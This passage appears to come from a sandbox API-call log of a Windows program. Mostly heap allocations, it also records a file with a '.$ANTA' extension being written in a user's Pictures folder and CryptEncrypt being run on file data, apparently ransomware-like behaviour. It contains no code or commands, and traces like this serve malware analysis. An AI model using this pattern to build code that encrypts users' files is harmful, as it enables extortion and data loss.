(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0087.820] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\ey_msasct-tppgup.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.821] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0087.822] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0087.822] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0087.822] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0087.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0087.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0087.825] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0087.825] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0087.827] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x463f, lpOverlapped=0x0) returned 1 [0087.827] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1463f) returned 0x4516010 [0087.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0087.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1463f) returned 0x452a658 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.831] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1463f) returned 0x4516010 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.831] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0087.831] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.832] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1463f) returned 0x4516010 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0087.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1463f) returned 0x499a008 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.833] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.834] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.834] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0087.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0087.835] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2650, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2650*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0087.835] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.836] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.836] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.836] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1463f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x14640) returned 1 [0087.836] CharLowerBuffW (in: lpsz="byte[83521]", cchLength=0xb | out: lpsz="byte[83521]") returned 0xb [0087.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 